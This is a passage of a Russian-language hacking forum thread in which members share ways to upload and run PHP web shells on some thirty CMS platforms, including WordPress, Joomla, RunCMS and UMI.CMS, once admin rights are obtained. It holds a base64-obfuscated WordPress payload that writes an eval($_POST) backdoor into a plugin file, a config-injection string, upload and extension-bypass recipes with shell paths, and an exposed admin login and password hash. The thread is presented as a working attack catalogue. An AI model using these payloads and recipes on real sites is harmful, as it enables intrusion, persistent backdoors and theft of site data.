Старый 28.09.2010, 16:26   #11
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Цитата:
Сообщение от Pr0xor Посмотреть сообщение
1. Заходим под админом admin и создаем второго админа sysop, в поле display_name, пишем
\\\';eval(base64_decode(cHJpbnQgZ2V0Y3dkKCk7));\\\'
Хорошая находка (жаль не до 2.9.2 - как раз есть такой, где нельзя файлы писать).
Один момент, в эксплойте вот такая строка:
PHP код:
$shellcode '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\''
Обрати внимание на одинарные кавычки, поэтому приведенную тобой строку нужно исправить на
Цитата:
\';eval(base64_decode(cHJpbnQgZ2V0Y3dkKCk7));\'
Цитата:
Сообщение от Pr0xor Посмотреть сообщение
WordPress 2.5.1 - 2.8.5
Первоисточник здесь http://www.80vul.com/exp/wordpress.txt, но он на китайском, в общем если посмотреть код WordPress
и указанный выше сплоит, то можно прийти к такому алгоритму

1. Заходим под админом admin и создаем второго админа sysop, в поле display_name, пишем
\\\';eval(base64_decode(cHJpbnQgZ2V0Y3dkKCk7));\\\ '

2. Далее начинает паралельно второй сеанс работы с блогом, то есть заходим под созданным админом sysop, из
под другого браузера, авторизация в блоге использует куки, поэтому такой вариант позволит использовать
блог сразу двумя админами.

3. Второй админ идет редактировать какой - нибудь пост например

site.com/blog/wp-admin/post.php?action=edit&post=11

В это время первый админ тоже обращается к этому посту и видит предупреждение, в котором будет выполнение
команды print getcwd();
Решил проверить. На 2.8.4 не работает. И вот почему:
PHP код:
    if ( current_user_can('edit_post'$post_ID) ) {
        if ( 
$last wp_check_post_lock$post->ID ) ) {
            
$last_user get_userdata$last );
            
$last_user_name $last_user $last_user->display_name __('Somebody');

            
$message sprintf__'Warning: %s is currently editing this post' ), wp_specialchars$last_user_name ) ); // it's a WP270
            
$message sprintf__'Warning: %s is currently editing this post' ), esc_html$last_user_name ) ); //  it's a wp2.8.4

            
$message str_replace"'""\'""<div class='error'><p>$message</p></div>" );
            
add_action('admin_notices'create_function''"echo '$message';" ) );
        } else {
            
wp_set_post_lock$post->ID );
            
wp_enqueue_script('autosave');
        }
    } 
В результате в БД как display-name попадает:
Цитата:
\';eval(base64_decode(cHJpbnQgZ2V0Y3dkKCk7));\' // 2.7.0
\&#39;;eval(base64_decode(cHJpbnQgZ2V0Y3dkKCk7));\&#39; // 2.8.4
При этом на 2.7.0 wp_specialchars не фильтрует кавычки, поэтому там кавычки в конечном счете пролазят.
В 2.8.4 (и возможно раньше) уже при изменении display-name идет фильтрация, и в БД идут хтмл-значения, а не кавычки.

Так что, надо проверять (мне лень) - возможно это еще раньше пофиксили.
SynQ вне форума   Ответить с цитированием
Старый 05.10.2010, 17:53   #12
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Joomla.
1001 способ
Нужны права админа.
Идём в Extensions -> Install/Uninstall
Цитата:
/administrator/index.php?option=com_installer
Нас интересует поле:
Install from URL (Тоже самое и с upload packade file (Ручная заливка))
Вбиваем туда http://your_site.com/dir/shell.php
shell.php обязательно должен быть в text/plain и с расширением .php
Жмём install.
Получаем ошибку :
Цитата:
Unknown Archive Type
Да нам всё равно как-то, идём /tmp/shell.php
Спасибо за внимание.
PHP код:
function _getPackageFromUrl()
    {
        
// Get a database connector
        
$db = & JFactory::getDBO();

        
// Get the URL of the package to install
        
$url JRequest::getString('install_url');

        
// Did you give us a URL?
        
if (!$url) {
            
JError::raiseWarning('SOME_ERROR_CODE'JText::_('Please enter a URL'));
            return 
false;
        }

        
// Download the package at the URL given
        
$p_file JInstallerHelper::downloadPackage($url);

        
// Was the package downloaded?
        
if (!$p_file) {
            
JError::raiseWarning('SOME_ERROR_CODE'JText::_('Invalid URL'));
            return 
false;
        }

        
$config =& JFactory::getConfig();
        
$tmp_dest     $config->getValue('config.tmp_path');

        
// Unpack the downloaded package file
        
$package JInstallerHelper::unpack($tmp_dest.DS.$p_file);

        return 
$package;
    } 
Уязвимость присутствует из-за того, когда файл помещается в tmp, он по окончанию установки (ошибки) не удаляется.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 12.10.2010, 17:20   #13
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
WordPress
WordPress 3.0.1
Можно ещё через плагины, только здесь придётся лить zip файл.
http://files.myopera.com/Ctacok/files/qwe.zip (Незнаю зачем, но пусть это будет здесь )
Цитата:
/wp-admin/plugin-install.php?tab=upload
Потом:
Цитата:
/wp-content/plugins/qwe/plugins/non_auth.php
Ctacok вне форума   Ответить с цитированием
Старый 23.10.2010, 14:22   #14
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

InstantCMS
Заходим в админку > Компоненты > Баннеры > Новый баннер и льем шелл.
Шелл будет тут:
Код:
site.com/images/banners/vashshell.php
Тестировалось на версиях : 1.1 ; 1.5.3
~d0s~ вне форума   Ответить с цитированием
Старый 07.02.2011, 20:29   #15
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию RunCMS 2.2.2

Заливка шелла в последнюю на данный момент версию RunCMS 2.2.2. Нужны права Админа. Идем в
Архив файлов -> Основные настройки -> Допустимые форматы скриншота
(modules/downloads/admin/index.php?op=downloadsConfigAdmin)

Это поле является предпоследней строкой кода в файле: \modules\downloads\cache\config.php
Вписываем:
Код:
.gif|.jpg|.bmp|.png'; phpinfo(); ?>
Сохраняем... и после обновления страницы отобразится phpinfo();
b3 вне форума   Ответить с цитированием
Старый 24.02.2011, 17:20   #16
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию Shop-Script PREMIUM

Заливка шелла в Shop-Script PREMIUM. Нужны права Админа.
Админка по умолчании расположена в site.com/admin.php
Заходим в Каталог->Категории и товары->Добавить новый товар. В появившемся окне заполняем форму, как угодно, и главный момент это, ставим галочку на чекбоксе Продукт является программой и заливаем пустой .htaccess дабы переписать существующий .htaccess в папке куда далее зальем наш web-shell.
Повторяем процедуру и уже заливаем шелл.
Шелл заливается в папку : site.com/products_files/ имя загружаемого файла не изменяется.
b3 вне форума   Ответить с цитированием
Старый 24.04.2011, 20:40   #17
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

послденее время все популярнее станоится UMI.CMS, но почему-то про нее никто не пишет
1. хэши админов нашел только в табле cms_backup
Цитата:
s:7:\"u-login\";s:8:\"YWRtaW4=\";s:14:\"u-password-md5\";s:44:\"YWFlZjg2MjEzYTE0NjI0MDJmMGE3NGQ5YzI3N WRmNzQ=\";
admin;aaef86213a1462402f0a74d9c275df74

2. если хостинг голимый, заливка легко производится через файловый менеджер, в любую папку
но, например на хостинге hc, исполняемый файлы должны быть с правами юзера и чмодом 755
для этого,
- пакуем шел в zip
- заливаем через файл менеджер в папку manifest/backup
- идем в модуль восстановления данных, выбираем наш архивчик и типа восстанавливаем резервную копия
- радуемся залитому и работающему шелу в корне сайта
3. для тех кто не нашел сам, конфиг базы в файле /mysql.php
vp$ вне форума   Ответить с цитированием
Старый 29.04.2011, 21:10   #18
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

simplacms

Зависимость: Нужны права админа.

При добавлении нового товара, есть опция Цифровой товар заливаем сначала пустой .htaccess а потом сам шелл. Но есть вышестоящий .htaccess с RemoveType php поэтому шелл заливаем на удачу в форматах phtml, html, php5 и тд.

Шелл заливается в http://host/simplacms/files/downloads/FILENAME имя файла не изменяется.

Последний раз редактировалось b3; 15.08.2012 в 12:10..
b3 вне форума   Ответить с цитированием
Старый 18.07.2011, 08:41   #19
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию livestreet

CMS: LiveStreet
Site: http://livestreet.ru/

1) Статические страницы http://www.site.com/admin/pages/list/
2) Добавляем новую http://www.site.com/admin/pages/new/
3) В поле текст пишем
Цитата:
[*PHP]
phpinfo();
[/PHP*]
* - Без звездочек
Цитата:
SQL:
Table:prefix_user

Columns:
user_id,
user_login,
user_password,
md5()
user_key,
user_mail,
user_skill,
user_date_register,
user_date_last,
user_date_activate,
user_date_comment_last,
user_ip_register,
user_ip_last,
user_rating,
user_count_vote,
user_activate,
user_activate_key,
user_profile_name,
user_profile_sex,
user_profile_country,
user_profile_region,
user_profile_city,
user_profile_birthday,
user_profile_site,
user_profile_site_name,
user_profile_icq,
user_profile_about,
user_profile_date,
user_profile_avatar,
user_profile_avatar_type,
user_profile_foto,
user_settings_notice_new_topic,
user_settings_notice_new_comment,
user_settings_notice_new_talk,
user_settings_notice_reply_comment,
user_settings_notice_new_friend

Последний раз редактировалось Twost; 18.07.2011 в 11:47..
Twost вне форума   Ответить с цитированием
Старый 26.08.2011, 03:52   #20
[Dark Green]
 
Регистрация: 06.07.2010
Сообщений: 15
Репутация: 38
По умолчанию

TerraShop CMS

Оф. сайт: terrashop.com.ua
Зависимость: админские права
Работаем с файлом /admin/fom_info.php При редактировании категории спокойно льем шелленг вместо картинки! Файлы в обязательном порядке подлежат переименованию, поэтому путь до шелла определяем вручную (вызывая свойства изображения). Шеллег ищем по адресу site/images/categories/[your_shell]

Diem Content Managment Framework
Оф. сайт: diem-project.org
Зависимость: админские права
Заливаемся через медиа менеджер - admin.php/tools/media/media/path

EasyWebManager ver 3.1
Оф. сайт: easywebmanager.com
Зависимость: админские права
Ищем модуль создания товаров/страниц, там можно прикреплять с локального диска изoбражение для товара. К имени шелла дописывается преф thumb_ , ищем шелл в site/files/upload/thumb_[your_shell]

Impresspages CMS
Оф. сайт: impresspages.eu
Зависимость: админские права
Открываем меню developer, выбираем любую вкладку которая имеет форму загрузки и спокойно льем свой shell.php, обновляем страницу! Имеем кривой и практически недееспособный веб-шелл(!) ==> находим в корне сайта файл ip_config.php и заменяем его содержимое на свой шелл-код! Вуаля! Наслаждаемся)

Catera CMS ver 3.0.2
Оф. сайт: Catera.Ru
Зависимость: админские права
Добавляем в настройках новый тип материала - PHP Далее, через модуль редактирования директорий, вместо картинки грузим на сервер шелл. Мы сами определяем директорию для загрузки файла.

Tradingeye CMS ver 6.1
Оф. сайт: tradingeye.com
Зависимость: админские права
1. Admin » File Manager » Add Files (файловый менеджер) - /admin/adminindex.php?action=file.uploadFrm&dir=menu
очень удобно, путь к шеллу выбираем сами )
2. Settings » Company Information » Edit Details (импорт логотипа) - /admin/adminindex.php?action=settings.company&flag=settin gs
Путь: site/images/company/
3. Admin » Import / Export Products (импорт CSV файла) - admin/adminindex.php?action=csv.home
Путь: site/images/csv/

TDSSE CMS ver 3.22
Оф. сайт: tdsse.com
Зависимость: админские права
Элементарно:
1 /admin.php?d=shabhtml
2 /admin/filemanager.php
3 /admin/imagemanager.php

SBuilder CMS ver 4.015
Оф. сайт: sbuilder.ru
Зависимость: админские права
1. Переходим в раздел настройки модулей (Меню Администратора / Настройки системы / Настройки «Вашего сайта» / Модули) и в поле "Расширения файлов доступных для загрузки" вписываем "php" и сохраняем настройки.
2. Переходим в раздел "Библиотека изображений" (Меню пользователя / Информационное наполнение / Библиотека изображений ) и выбираем "добавить изображение"
2.1 Вкладка «Основные» - Указываем имя изображения , например evil.php =)
2.2 Вкладка «Изображения» указываем адрес нашего веб-шелла. Допустима загрузка с локального диска и с удаленного хоста. При этом необходимо указать адрес веб-шелла во всех трех вариантах: большое изображение, среднее изображение, маленькое изображение.
2.3 Нажимаем «сохранить» и переносимся в «библиотеку изображений» где видим наш шелл. Открываем свойства изображения (слева от нашего файла evil.php) и видим полный путь до шелла.

ATOM Content Management System ver 2.0
Оф. сайт: realiseyourdesign.co.uk
Зависимость: админские права
1) site/cms/ftp_add.php
2) site/cms/pictures_add.php?id=[id]&title=[category]
Путь: site/cms/pictures/[your_shell]

Instant Update CMS
Оф. сайт: cubescripts.com
Зависимость: админские права
1) site/manage/editfiles.php
2) site/manage/scripts/assetmanager/assetmanager.php
Заходим в настройки - site/manage/settings.php и добавляем php5 в список допустимых для импорта расширений, а так же, меняем адрес диры в которую происходит импорт(по умолчанию UserFiles), например на - manage/images. в дефолтной папке выполнение php кода запрещено .htaccess'om

RedKeyCMS
Оф. сайт: redkeycms.com
Зависимость: админские права
Элементарно, 2 способа:
1) Файловый менеджер - site/admin/index.php?action=file_manager
2) Редактор тем оформления - site/demo/admin/?action=templates&do=edit&file=index.php&template= default&ext=php

PornCMS
Оф. сайт: camstudiocms.com
Зависимость: админские права
Работаем с файлом site/adm.in/index.php?newml=upload файл зальется с расширением .php.gif
Путь: site/adm.in/upload/[your_shell]

eFront CMS
Оф. сайт: efrontlearning.net
Зависимость: админские права
Пошагово:
Разрешаем редактирование/добавление языков - site/administrator.php?ctg=system_config
Выбираем и редактируем/импортируем язык - site/administrator.php?ctg=language
Путь: site/index.php?bypass_language=your_hacking_language_na me

CMS Website
Оф. сайт: website.is
Зависимость: админские права
xерез модуль - /catalog/control.php?module=files заливаем шелл с расширением .php.blablabla

Viart CMS
Оф. сайт: viart.com
Зависимость: админские права
1) site/admin/admin_fm.php
2) site/admin/admin_upload.php?filetype=banner путь к шеллу виден на странице
site/admin/admin_banner.php

castcom CMS
Оф. сайт: castcom.ru
Зависимость: админские права
На странице - site/admin/system/index.php#banner заливаем шелл с расширением .php.blablabla
Путь: site/uplfile/banner/[your_shell]

Simplacms CMS ver 1.4.2
Оф. сайт: simplacms.ru
Зависимость: админские права
Спасибо TinyMсе(!) - открываем и редактируем новость,каталог,статью и почти все, что душе угодно. справа от кнопки "вставить картинку" есть "файловый менеджер" - открываем. Удаляем враждебно настроенный .htaccess и спокойно заливаемся. по умолчанию http://localhost/file/


Collabtive CMS
Оф. сайт: collabtive.o-dyn.de
Зависимость: админские права
при работе со скриптом - /managefile.php?action=showproject&id=[id]&mode=added все файлы аля .php, .php3, .php4 и прочие ваулируются и переименовываются в txt, не беда, shell.phtml нас вполне устраивает

Intrid CMS
Оф. сайт: intrid.ru
Зависимость: админские права
при работе со скриптом /admin-gallery.php?action=uploadimages&id=0 спокойно заливаем веб-шелл с любым расширением(!)

zoommarket ver 1.0
Оф. сайт: about.zoommarket.ru
Зависимость: админские права
Настраиваем импорт файлов, добавляем интересующее нас расширение, скрипт - main.php?do=settings&key=general Импортируем - /main.php?do=files&act=paste&mode=move

Я кончил
[Dark Green] вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot